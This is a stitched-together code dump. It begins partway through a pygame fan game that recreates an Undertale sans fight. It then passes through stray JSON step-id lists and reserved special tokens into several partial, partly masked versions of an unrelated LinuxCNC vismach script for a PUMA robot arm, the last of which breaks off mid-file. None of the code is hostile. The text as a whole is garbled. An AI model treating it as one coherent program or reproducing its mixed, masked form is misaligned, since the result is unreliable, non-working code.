_boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0] - 10, BOX_POS[1] - 10],\n angle=45,\n time1=10,\n time2=70,\n time3=0,\n width=60\n )\n )\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0] - 10, BOX_POS[1] + BOX_SIZE[1] + 10],\n angle=-45,\n time1=10,\n time2=70,\n time3=0,\n width=60\n )\n )\n \ndef flash_round_5():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0], 50],\n angle=90,\n time1=10,\n time2=70,\n time3=0,\n width=60\n )\n )\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0] + BOX_SIZE[0], 50],\n angle=90,\n time1=10,\n time2=70,\n time3=0,\n width=60\n )\n )\n blasters.append(\n GasterBlaster(\n pos=[50, BOX_POS[1] + 50],\n angle=0,\n time1=10,\n time2=70,\n time3=0,\n width=100\n )\n )\n \ndef flash_round_6():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0], 50],\n angle=90,\n time1=10,\n time2=70,\n time3=0,\n width=60\n )\n )\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0] + BOX_SIZE[0], 50],\n angle=90,\n time1=10,\n time2=70,\n time3=0,\n width=60\n )\n )\n blasters.append(\n GasterBlaster(\n pos=[50, BOX_POS[1] + BOX_SIZE[1] - 50],\n angle=0,\n time1=10,\n time2=70,\n time3=0,\n width=100\n )\n )\n \ndef flash_round_7():\n set_turn_time(150)\n global BOX_SIZE, BOX_POS, _boxpos, _boxsize\n BOX_POS = _boxpos = [230, 230]\n BOX_SIZE = _boxsize = [150, 
150]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2]\n for _ in range(3):\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0], BOX_POS[1] - 20],\n time1=1000,\n time2=_ * 50 + 20,\n length=150,\n angle=-20,\n speed=[0, 4, 0, 0]\n )\n )\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] + 20],\n time1=1000,\n time2=_ * 50 + 20,\n length=150,\n angle=20,\n speed=[0, -4, 0, 0]\n )\n )\n \n bones.append(\n RotatableBone(\n pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 20],\n time1=1000,\n time2=_ * 50 + 50,\n length=150,\n angle=20,\n speed=[0, 4, 0, 0]\n )\n )\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] + BOX_SIZE[1] + 20],\n time1=1000,\n time2=_ * 50 + 50,\n length=150,\n angle=-20,\n speed=[0, -4, 0, 0]\n )\n )\n \n\nrandom_attacks = [flash_round_1,\n flash_round_2,\n flash_round_3,\n flash_round_4,\n flash_round_5,\n flash_round_6,\n flash_round_7]\nfor _ in range(5):\n attacks.append(random.choice(random_attacks))\n attacks.append(flash_round)\n \nplayers_turn(\"* ...\")\n \n@add_attack\ndef windmill():\n set_turn_time(1200)\n global BOX_POS, BOX_SIZE, before_strike, after_strike\n def before_strike():\n global sans_damage\n sans_damage = 1\n after_strike = lambda : ...\n BOX_POS = [150, 240]\n BOX_SIZE = [150, 150]\n\n def movegb(screen):\n for i in range(4):\n blasters[i].angle += 1\n blasters[i].end_angle += 1\n blasters[i].radian += radians(-1)\n blasters[i].back_speed = 0\n\n for angle in range(360 * 5):\n tasks.append(Task(movegb, angle * 0.4 + 100))\n \n def enablerecoil(screen):\n for b in blasters:\n b.norecoil = False\n\n tasks.append(Task(enablerecoil, 800))\n\n for angle in range(0, 360, 90):\n blasters.append(GasterBlaster(\n pos=[150 + 150 / 2, 240 + 150 / 2],\n angle=angle,\n time1=10,\n time2=1000,\n width=30,\n time3=0,\n norecoil=True\n ))\n\nplayers_turn(\"* ...\")\n\n@add_attack\ndef gameend():\n ...\n\n# 
------------------------------------\n\"\"\"主程序\"\"\"\n\nwhile True:\n # ---------------------------------------------------------\n '''实例化'''\n from locals_ import *\n time = 0\n _boxpos = [0, 0]\n _boxsize = SCREEN_SIZE[:]\n rightdown = SCREEN_SIZE[:]\n\n time1 = 0\n time2 = 0\n delta = 1\n blasters = []\n bones = []\n tasks = []\n warns = []\n texts = []\n boards = []\n before_strike = None\n after_strike = None\n sans = Sans([280, 80])\n player = Player([0, 0])\n actions = {\n \"* check\" : CHECK_SANS,\n \"* heal ({} time(s) left)\" : HEAL_SANS\n }\n mc_actions = {\n \"* spare\" : MERCY_SANS_SPARE,\n \"* flee\" : MERCY_SANS_FLEE\n }\n pygame.mixer.music.stop()\n if FULL_SCREEN:\n display = pygame.display.set_mode((1920, 1080), FULLSCREEN)\n else:\n display = pygame.display.set_mode(SCREEN_SIZE)\n while True:\n time1 = time_.time()\n # 屏幕震动\n if screen_shaking:\n screen_offset[0] = random.randint(-5, 5)\n screen_offset[1] = random.randint(-5, 5)\n else:\n screen_offset = [0, 0]\n # 屏幕旋转\n if spinning_left:\n screen_angle -= 1\n # 屏幕旋转\n if spinning_right:\n screen_angle += 1\n # 测试区\n if DEBUG:...\n # 战斗框位移\n if _boxpos[0] != BOX_POS[0]:\n if abs(BOX_POS[0] - _boxpos[0]) < 0.1:\n _boxpos[0] = BOX_POS[0]\n else:\n _boxpos[0] += (BOX_POS[0] - _boxpos[0]) / 5\n if _boxpos[1] != BOX_POS[1]:\n if abs(BOX_POS[1] - _boxpos[1]) < 0.1:\n _boxpos[1] = BOX_POS[1]\n else:\n _boxpos[1] += (BOX_POS[1] - _boxpos[1]) / 5\n\n # 战斗框大小\n if rightdown[0] != BOX_POS[0] + BOX_SIZE[0]:\n if abs(BOX_POS[0] + BOX_SIZE[0] - rightdown[0]) < 0.1:\n rightdown[0] = BOX_POS[0] + BOX_SIZE[0]\n else:\n rightdown[0] += (BOX_POS[0] + BOX_SIZE[0] - rightdown[0]) / 5\n if rightdown[1] != BOX_POS[1] + BOX_SIZE[1]:\n if abs(BOX_POS[1] + BOX_SIZE[1] - rightdown[1]) < 0.1:\n rightdown[1] = BOX_POS[1] + BOX_SIZE[1]\n else:\n rightdown[1] += (BOX_POS[1] + BOX_SIZE[1] - rightdown[1]) / 5\n _boxsize = [\n rightdown[0] - _boxpos[0],\n rightdown[1] - _boxpos[1]\n ]\n\n if time >= len(attacks):\n exit()\n if 
not stop and not is_players_turn:\n attacks[time]()\n time += 1\n stop = True\n\n screen.fill((0, 0, 0, 255))\n display.fill((0, 0, 0))\n mask_surface_blue.fill((0, 0, 0, 0))\n mask_surface_orange.fill((0, 0, 0, 0))\n mask_surface_normal.fill((0, 0, 0, 0))\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n exit()\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n pygame.quit()\n exit()\n if event.key in (K_z, K_RETURN):\n if sans.show_index >= len(sans.text) and sans.show_text == True:\n sans.show_text = False\n stop = False\n elif page in (CHECK_SANS, HEAL_SANS, HEAL_SANS_CANT) and shown_index >= len(battle_text):\n is_players_turn = False\n stop = False\n page = MAIN_PAGE\n player.pos = [\n BOX_POS[0] + BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2\n ]\n player.select_sound.play()\n else:\n player.choose = is_players_turn\n if is_players_turn and page != FIGHT_SANS:\n player.select_sound.play()\n if event.key in (K_x, K_RSHIFT):\n sans.show_index = len(sans.text)\n shown_index = len(battle_text)\n player.back = True\n player.choice = 0\n if event.key == K_UP:\n player.going_up = True\n if event.key == K_DOWN:\n player.going_down = True\n if event.key == K_LEFT:\n player.going_left = True\n if event.key == K_RIGHT:\n player.going_right = True\n if event.key == K_F4:\n if FULL_SCREEN:\n display = pygame.display.set_mode(SCREEN_SIZE)\n FULL_SCREEN = 0\n else:\n display = pygame.display.set_mode((1920, 1080), FULLSCREEN)\n FULL_SCREEN = 1\n if event.key == K_F2:\n restarting = True\n \n if DEBUG:\n if event.key == K_n:\n bones.clear()\n boards.clear()\n blasters.clear()\n stop = False\n if event.key == K_EQUALS:\n frames += 1\n if event.key == K_MINUS:\n frames -= 1\n if event.type == KEYUP:\n if event.key == K_UP:\n player.going_up = False\n if event.key == K_DOWN:\n player.going_down = False\n if event.key == K_LEFT:\n player.going_left = False\n if event.key == K_RIGHT:\n player.going_right = False\n if event.key == K_ESCAPE:\n 
pygame.quit()\n exit()\n if event.key in (K_z, K_RETURN):\n player.choose = False\n if event.key in (K_x, K_RSHIFT):\n player.back = False\n\n '''检测&更新'''\n \n # 战斗框\n pygame.draw.rect(screen, (255, 255, 255, 255), pygame.Rect((_boxpos[0] - 5, _boxpos[1] - 5),\n (_boxsize[0] + 10, _boxsize[1] + 10)))\n pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect(_boxpos, _boxsize)) # 内遮挡\n # 骨头\n for b in bones:\n b.show(screen,\n mask_surface_blue,\n mask_surface_orange,\n mask_surface_normal)\n if b.stop:\n bones.remove(b)\n # 警告框\n for w in warns:\n w.show(screen)\n if w.stop:\n warns.remove(w)\n # 板子\n for b in boards:\n b.show(screen)\n if b.stop:\n boards.remove(b)\n \n if b.rect.colliderect(player.rect) and player.falling:\n player.pos[0] += b.speed[0]\n player.pos[1] += b.speed[1]\n if player.direction == DOWN:\n player.pos[1] = b.rect.top - 7\n elif player.direction == UP:\n player.pos[1] = b.rect.bottom - 1\n elif player.direction == RIGHT:\n player.pos[0] = b.rect.left - 7\n elif player.direction == LEFT:\n player.pos[0] = b.rect.right - 1\n player.falling = False\n\n \"\"\"外遮挡\"\"\"\n pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect((0, 0), (SCREEN_SIZE[0], _boxpos[1] - 5)))\n pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect((0, _boxpos[1] - 5), (_boxpos[0] - 5, _boxsize[1] + 10)))\n pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect((0, _boxpos[1] + _boxsize[1] + 5),\n (SCREEN_SIZE[0], SCREEN_SIZE[1] - (_boxpos[1] + _boxsize[1]) - 5)))\n pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect((_boxpos[0] + _boxsize[0] + 5, _boxpos[1] - 5),\n (SCREEN_SIZE[0] - (_boxpos[0] + _boxsize[0]) - 5, _boxsize[1] + 10)))\n \n '''显示UI(外面)'''\n pygame.draw.rect(screen, (191, 0, 0, 255), pygame.Rect((275, 400), (92, 20)))\n if player.KR:\n pygame.draw.rect(screen, (255, 0, 255, 255), pygame.Rect((275 + player.HP, 400), (round(player.KR), 20)))\n pygame.draw.rect(screen, (255, 255, 0, 255), pygame.Rect((275, 400), (player.HP, 20)))\n screen.blit(\n font2.render(\n 
\"{:0>2.0f} / 92\".format(player.HP + player.KR),\n True,\n (255, 255, 255) if not round(player.KR) else (255, 0, 255)\n ),\n (\n 415,\n 400\n )\n )\n screen.blit(hp_image, (240, 405))\n screen.blit(kr_image, (375, 405))\n screen.blit(\n font2.render(\n \"Chara LV 19\", True, (255, 255, 255)\n ), (30, 400)\n )\n \n # 显示文本\n for text in texts:\n screen.blit(\n font.render(\n text[1], True, (255, 255, 255)\n ), text[0]\n )\n\n if DEBUG:\n screen.blit(\n font2.render(\n \"DEBUG\", True, (0, 0, 255)\n ), (200, 0)\n )\n # 显示帧数\n screen.blit(\n font2.render(\n \"FPS:{:0>3d}\".format(round(1 / delta)), True, (0, 0, 255)\n ), (0, 0)\n )\n if fight:\n screen.blit(fight_highlight_image, fight_pos)\n else:\n screen.blit(fight_default_image, fight_pos)\n if act:\n screen.blit(act_highlight_image, act_pos)\n else:\n screen.blit(act_default_image, act_pos)\n if item:\n screen.blit(item_highlight_image, item_pos)\n else:\n screen.blit(item_default_image, item_pos)\n if mercy:\n screen.blit(mercy_highlight_image, mercy_pos)\n else:\n screen.blit(mercy_default_image, mercy_pos)\n \n # 鳝丝(要放在外面)\n sans.show(screen)\n if show_sans_damage:\n if sans_damage == MISS:\n screen.blit(miss_image, (250, 60))\n \n # GB炮(要放在外面)\n for t in blasters:\n t.show(screen,\n mask_surface_blue,\n mask_surface_orange,\n mask_surface_normal)\n if t.stop:\n blasters.remove(t)\n\n # 其他东西,blahblahblah(外面)\n for t in tasks:\n t.show(screen)\n if t.stop:\n tasks.remove(t)\n\n if is_players_turn: # 玩家回合\n BOX_POS = [30, 250]\n BOX_SIZE = [570, 130]\n if page == MAIN_PAGE:\n if shown_index < len(battle_text):\n shown_index += 1\n text_sound.play()\n x = 40\n y = 250\n for char in battle_text[:shown_index]:\n if char != '\\n':\n screen.blit(\n battle_font.render(char, True, (255, 255, 255)),\n (x, y)\n )\n x += 12\n if x > BOX_POS[0] + BOX_SIZE[0] or char == \"\\n\":\n y += 16\n x = 40\n player.type = CURSOR_SOUL\n player.options = (\n (fight_pos[0] + 10, fight_pos[1] + 15),\n ( act_pos[0] + 10, act_pos[1] + 
15),\n ( item_pos[0] + 10, item_pos[1] + 15),\n (mercy_pos[0] + 10, mercy_pos[1] + 15)\n )\n\n if player.choice == 0:\n fight = True\n act = False\n item = False\n mercy = False\n\n if player.choice == 1:\n fight = False\n act = True\n item = False\n mercy = False\n\n if player.choice == 2:\n fight = False\n act = False\n item = True\n mercy = False\n\n if player.choice == 3:\n fight = False\n act = False\n item = False\n mercy = True\n\n if player.choose:\n page = [FIGHT, ACT, 0, MERCY][player.choice]\n player.choose = False\n player.choice = 0\n fight = False\n act = False\n item = False\n mercy = False\n\n if page == ACT:\n player.options = [(40, 255)]\n screen.blit(\n battle_font.render(\"* sans\", True, (255, 255, 255)),\n (40, 250)\n )\n if player.choose:\n page = [ACT_SANS][player.choice]\n player.choose = False\n player.choice = 0\n if player.back:\n page = MAIN_PAGE\n\n if page == ACT_SANS:\n player.options = []\n y = 250\n for _ in actions.keys():\n if actions[_] == HEAL_SANS:\n _ = _.format(heal_times_left)\n screen.blit(\n battle_font.render(_, True, (255, 255, 255)),\n (40, y)\n )\n player.options.append((40, y + 5))\n y += 20\n \n if player.choose:\n page = list(actions.values())[player.choice]\n if page == HEAL_SANS:\n if heal_times_left > 0:\n heal(player, 92)\n heal_times_left -= 1\n else:\n page = HEAL_SANS_CANT\n player.choose = False\n player.choice = 0\n if player.back:\n page = ACT\n\n if page == CHECK_SANS:\n player.type = RED_SOUL\n player.pos = [\n -100,\n -100\n ]\n battle_text = \"* Sans\\n The TRUE HERO.\\n ATK:1\\n DEF:1\\n Nothing to say.\"\n if shown_index < len(battle_text):\n shown_index += 1\n text_sound.play()\n x = 40\n y = 250\n for char in battle_text[:shown_index]:\n if char != '\\n':\n screen.blit(\n battle_font.render(char, True, (255, 255, 255)),\n (x, y)\n )\n x += 12\n if x > BOX_POS[0] + BOX_SIZE[0] or char == \"\\n\":\n y += 20\n x = 40\n\n if page == HEAL_SANS:\n player.type = RED_SOUL\n player.pos = [\n -100,\n -100\n 
]\n battle_text = \"* You are healthy again now.\\n* {} time(s) left.\".format(heal_times_left)\n if shown_index < len(battle_text):\n shown_index += 1\n text_sound.play()\n x = 40\n y = 250\n for char in battle_text[:shown_index]:\n if char != '\\n':\n screen.blit(\n battle_font.render(char, True, (255, 255, 255)),\n (x, y)\n )\n x += 12\n if x > BOX_POS[0] + BOX_SIZE[0] or char == \"\\n\":\n y += 20\n x = 40\n\n if page == HEAL_SANS_CANT:\n player.type = RED_SOUL\n player.pos = [\n -100,\n -100\n ]\n battle_text = \"* No more times for you to heal!\"\n if shown_index < len(battle_text):\n shown_index += 1\n text_sound.play()\n x = 40\n y = 250\n for char in battle_text[:shown_index]:\n if char != '\\n':\n screen.blit(\n battle_font.render(char, True, (255, 255, 255)),\n (x, y)\n )\n x += 12\n if x > BOX_POS[0] + BOX_SIZE[0] or char == \"\\n\":\n y += 20\n x = 40\n\n if page == FIGHT:\n player.options = [(40, 255)]\n screen.blit(\n battle_font.render(\"* sans\", True, (255, 255, 255)),\n (40, 250)\n )\n if player.choose:\n page = [FIGHT_SANS][player.choice]\n player.choose = False\n player.choice = 0\n choice_pos = [50, 250]\n if player.back:\n page = MAIN_PAGE\n\n if page == FIGHT_SANS:\n player.type = RED_SOUL\n player.pos = [\n -100,\n -100\n ]\n target_img.set_alpha(target_alpha)\n if not choice_blink:\n if target_alpha >= 255:\n choice_going = True\n else:\n target_alpha += 10\n screen.blit(target_img, [BOX_POS[0] + 10, BOX_POS[1] + 5])\n screen.blit([choice_img, choice_blink_img][choice_ani_index // 5 % 2], choice_pos)\n choice_ani_index += choice_blink\n choice_pos[0] += choice_going * 8\n if choice_going and (player.choose or choice_pos[0] > BOX_POS[0] + BOX_SIZE[0]):\n choice_going = False\n choice_blink = True\n tasks.append(Strike(sans.pos[:]))\n if not before_strike:\n sans.target_pos = [100, 80]\n else:\n before_strike()\n if choice_blink:\n blink_time += 1\n if blink_time > 60:\n show_sans_damage = False\n choice_going = False\n choice_blink = 
False\n choice_ani_index = 0\n target_alpha = 0\n blink_time = 0\n is_players_turn = False\n stop = False\n page = MAIN_PAGE\n if not after_strike:\n sans.target_pos = [250, 80]\n else:\n after_strike()\n player.pos = [\n BOX_POS[0] + BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2\n ]\n elif blink_time > 30:\n target_alpha -= 10\n show_sans_damage = True\n\n if page == MERCY:\n player.options = [(40, 255)]\n screen.blit(\n battle_font.render(\"* sans\", True, (255, 255, 255)),\n (40, 250)\n )\n if player.choose:\n page = [MERCY_SANS][player.choice]\n player.choose = False\n player.choice = 0\n if player.back:\n page = MAIN_PAGE\n\n if page == MERCY_SANS:\n player.options = []\n y = 250\n for _ in mc_actions.keys():\n screen.blit(\n battle_font.render(_, True, (255, 255, 255)),\n (40, y)\n )\n player.options.append((40, y + 5))\n y += 20\n \n if player.choose:\n page = list(mc_actions.values())[player.choice]\n player.choose = False\n player.choice = 0\n if player.back:\n page = MERCY\n\n if page == MERCY_SANS_SPARE: # 你都饶恕了,想必也不想继续玩了()\n exit()\n\n if page == MERCY_SANS_FLEE: # 你都逃跑了,想必也不想继续玩了()\n exit()\n\n # 你死了\n if player.HP + player.KR <= 0:\n DEAD = True\n if DEAD or restarting:\n break\n\n # 判定伤害\n blue_mask = pygame.mask.from_surface(mask_surface_blue)\n orange_mask = pygame.mask.from_surface(mask_surface_orange)\n normal_mask = pygame.mask.from_surface(mask_surface_normal)\n if mask_collide(blue_mask, player.mask, [0, 0], player.mask_pos):\n if any([player.going_up, player.going_down, player.going_left, player.going_right, player.falling]):\n damage(player)\n if mask_collide(orange_mask, player.mask, [0, 0], player.mask_pos):\n if not any([player.going_up, player.going_down, player.going_left, player.going_right, player.falling]):\n damage(player)\n if mask_collide(normal_mask, player.mask, [0, 0], player.mask_pos):\n damage(player)\n\n # 玩家\n player.show(screen, _boxpos, _boxsize)\n\n # 黑屏攻击\n if blackout:\n screen.fill(0x000000)\n\n 
\"\"\"将screen的图像加工后放入display\"\"\"\n if not FULL_SCREEN:\n rotated_screen = pygame.transform.rotate(screen, screen_angle)\n else:\n screen_rect = screen.get_rect()\n rotated_screen = pygame.transform.rotate(\n pygame.transform.scale(\n screen,\n (\n round(screen_rect.size[1] / screen_rect.size[0] * 1920),\n 1080\n )\n ),\n screen_angle\n )\n rotated_rect = rotated_screen.get_rect()\n if not FULL_SCREEN:\n rotated_rect.center = [SCREEN_SIZE[0] // 2, SCREEN_SIZE[1] // 2]\n else:\n rotated_rect.center = [960, 540]\n display.blit(rotated_screen,\n (rotated_rect.x + screen_offset[0],\n rotated_rect.y + screen_offset[1]))\n fps.tick(frames)\n pygame.display.update()\n time2 = time_.time()\n delta = time2 - time1\n\n if not restarting:\n ticks = 0\n heart_offset = [0, 0]\n while True:\n '''死后的'''\n pygame.mixer.music.stop()\n ticks += 1\n screen.fill((0, 0, 0, 255))\n if ticks >= 200:\n break\n \n if ticks >= 160:\n screen.blit(alive_img, player.rect)\n if ticks == 160:\n split_sound.play()\n \n elif ticks >= 100:\n screen.blit(dead_img,\n (player.rect.x + heart_offset[0],\n player.rect.y + heart_offset[1]))\n heart_offset = [random.randint(-2, 2), random.randint(-2, 2)]\n \n elif ticks >= 60:\n screen.blit(dead_img, player.rect)\n if ticks == 60:\n split_sound.play()\n \n else:\n screen.blit(alive_img, player.rect)\n \n if not FULL_SCREEN:\n rotated_screen = pygame.transform.rotate(screen, screen_angle)\n else:\n screen_rect = screen.get_rect()\n rotated_screen = pygame.transform.rotate(\n pygame.transform.scale(\n screen,\n (\n round(screen_rect.size[1] / screen_rect.size[0] * 1920),\n 1080\n )\n ),\n screen_angle\n )\n rotated_rect = rotated_screen.get_rect()\n if not FULL_SCREEN:\n rotated_rect.center = [SCREEN_SIZE[0] // 2, SCREEN_SIZE[1] // 2]\n else:\n rotated_rect.center = [960, 540]\n display.blit(rotated_screen,\n (rotated_rect.x + screen_offset[0],\n rotated_rect.y + screen_offset[1]))\n fps.tick(frames)\n pygame.display.update()\n",
"step-ids": [
16,
26,
28,
32,
47
]
}
|
[
16,
26,
28,
32,
47
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
c.newpin('joint1', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint2', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint3', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint4', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint5', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint6', hal.HAL_FLOAT, hal.HAL_IN)
c.ready()
<|reserved_special_token_0|>
main(model, tooltip, work, 1500)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
c = hal.component('pumagui')
c.newpin('joint1', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint2', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint3', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint4', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint5', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint6', hal.HAL_FLOAT, hal.HAL_IN)
c.ready()
finger1 = CylinderZ(0, 5, 50, 5)
tooltip = Capture()
link6 = Collection([finger1, Box(-25, -25, -10, 25, 25, 0)])
link6 = Translate([link6], 0, 0, -50)
link6 = Collection([tooltip, link6])
link6 = HalRotate([link6], c, 'joint6', 1, 0, 0, 1)
link5 = Collection([CylinderZ(27, 30, 35, 30), CylinderX(-13, 25, 13, 25),
Box(-11, -25, 0, 11, 25, 27)])
link5 = Collection([link5, Translate([link6], 0, 0, 95)])
link5 = HalRotate([link5], c, 'joint5', 1, 1, 0, 0)
link4 = Collection([CylinderX(-13, 22, -27, 22), CylinderX(13, 22, 27, 22),
Box(-15, -22, -30, -25, 22, 0), Box(15, -22, -30, 25, 22, 0), Box(-25,
-25, -45, 25, 25, -30)])
link4 = Translate([link4, link5], 0, 0, 0)
link4 = HalRotate([link4], c, 'joint4', 1, 0, 0, 1)
link3 = Collection([CylinderY(-50, 35, 25, 35), CylinderZ(0.0, 35, 400 - 45,
25)])
link3 = Translate([link3], 0, 50, 0)
link3 = Collection([link3, CylinderX(-50, 40, 40, 40)])
link3 = Collection([link3, Translate([link4], 0.0, 50, 400)])
link3 = Translate([link3], 100, 0, 0.0)
link3 = Rotate([link3], 90, 1, 0, 0)
link3 = HalRotate([link3], c, 'joint3', 1, 1, 0, 0)
link2 = CylinderX(-50, 50, 50, 50)
link2 = Translate([link2], 0.0, 0.0, 400)
link2 = Collection([link2, CylinderZ(400, 40, 0, 50), CylinderX(-70, 85, 70,
85)])
link2 = Collection([link2, Translate([link3], 0, 0.0, 400)])
link2 = Rotate([link2], 90, 1, 0, 0)
link2 = HalRotate([link2], c, 'joint2', 1, 1, 0, 0)
link1 = Collection([CylinderX(-70, 70, 70, 70), Box(-70, -70, 0, 70, 70, -100)]
)
link1 = Collection([link1, link2])
link1 = Translate([link1], 0.0, 0.0, 100)
link1 = HalRotate([link1], c, 'joint1', 1, 0, 0, 1)
link0 = Collection([CylinderZ(750, 75, 800, 75), CylinderZ(25, 90, 750, 50),
CylinderZ(0, 200, 35, 200)])
link0 = Collection([link0, Translate([link1], 0.0, 0.0, 800)])
floor = Box(-500, -500, -10, 500, 500, 0.0)
work = Capture()
model = Collection([link0, floor, work])
main(model, tooltip, work, 1500)
<|reserved_special_token_1|>
from vismach import *
import hal
c = hal.component('pumagui')
c.newpin('joint1', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint2', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint3', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint4', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint5', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint6', hal.HAL_FLOAT, hal.HAL_IN)
c.ready()
finger1 = CylinderZ(0, 5, 50, 5)
tooltip = Capture()
link6 = Collection([finger1, Box(-25, -25, -10, 25, 25, 0)])
link6 = Translate([link6], 0, 0, -50)
link6 = Collection([tooltip, link6])
link6 = HalRotate([link6], c, 'joint6', 1, 0, 0, 1)
link5 = Collection([CylinderZ(27, 30, 35, 30), CylinderX(-13, 25, 13, 25),
Box(-11, -25, 0, 11, 25, 27)])
link5 = Collection([link5, Translate([link6], 0, 0, 95)])
link5 = HalRotate([link5], c, 'joint5', 1, 1, 0, 0)
link4 = Collection([CylinderX(-13, 22, -27, 22), CylinderX(13, 22, 27, 22),
Box(-15, -22, -30, -25, 22, 0), Box(15, -22, -30, 25, 22, 0), Box(-25,
-25, -45, 25, 25, -30)])
link4 = Translate([link4, link5], 0, 0, 0)
link4 = HalRotate([link4], c, 'joint4', 1, 0, 0, 1)
link3 = Collection([CylinderY(-50, 35, 25, 35), CylinderZ(0.0, 35, 400 - 45,
25)])
link3 = Translate([link3], 0, 50, 0)
link3 = Collection([link3, CylinderX(-50, 40, 40, 40)])
link3 = Collection([link3, Translate([link4], 0.0, 50, 400)])
link3 = Translate([link3], 100, 0, 0.0)
link3 = Rotate([link3], 90, 1, 0, 0)
link3 = HalRotate([link3], c, 'joint3', 1, 1, 0, 0)
link2 = CylinderX(-50, 50, 50, 50)
link2 = Translate([link2], 0.0, 0.0, 400)
link2 = Collection([link2, CylinderZ(400, 40, 0, 50), CylinderX(-70, 85, 70,
85)])
link2 = Collection([link2, Translate([link3], 0, 0.0, 400)])
link2 = Rotate([link2], 90, 1, 0, 0)
link2 = HalRotate([link2], c, 'joint2', 1, 1, 0, 0)
link1 = Collection([CylinderX(-70, 70, 70, 70), Box(-70, -70, 0, 70, 70, -100)]
)
link1 = Collection([link1, link2])
link1 = Translate([link1], 0.0, 0.0, 100)
link1 = HalRotate([link1], c, 'joint1', 1, 0, 0, 1)
link0 = Collection([CylinderZ(750, 75, 800, 75), CylinderZ(25, 90, 750, 50),
CylinderZ(0, 200, 35, 200)])
link0 = Collection([link0, Translate([link1], 0.0, 0.0, 800)])
floor = Box(-500, -500, -10, 500, 500, 0.0)
work = Capture()
model = Collection([link0, floor, work])
main(model, tooltip, work, 1500)
<|reserved_special_token_1|>
#! /usr/bin/python2
# Copyright 2007 John Kasunich and Jeff Epler
#
# modified by Rudy du Preez to fit with the kinematics component pumakins.c
# Note: DH parameters in pumakins halfile should bet set to
# A2=400, A3=50, D3=100, D4=400, D6=95
#
# z |
# |
# |__________y top of the base.
# /
# / A2
# x /
# /_______
# D3 /
# / A3
# |
# |
# | D4
# |___
# |
# tooltip | D6
#
# or they should be changed below to fit. Otherwise you wont get straight lines
# moving x or y or z in world mode. If all is correct the tool should rotate
# about its tip with no x,y,z movement for changes in A,B,C at any point in the
# workspace.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
from vismach import *
import hal
c = hal.component("pumagui")
c.newpin("joint1", hal.HAL_FLOAT, hal.HAL_IN)
c.newpin("joint2", hal.HAL_FLOAT, hal.HAL_IN)
c.newpin("joint3", hal.HAL_FLOAT, hal.HAL_IN)
c.newpin("joint4", hal.HAL_FLOAT, hal.HAL_IN)
c.newpin("joint5", hal.HAL_FLOAT, hal.HAL_IN)
c.newpin("joint6", hal.HAL_FLOAT, hal.HAL_IN)
c.ready()
###################
# tool or finger
finger1 = CylinderZ(0, 5, 50, 5)
# "tooltip" for backplot will be the tip of the finger
tooltip = Capture()
# "hand" - the part the finger is attached to
link6 = Collection([
finger1,
Box(-25, -25, -10, 25, 25, 0)])
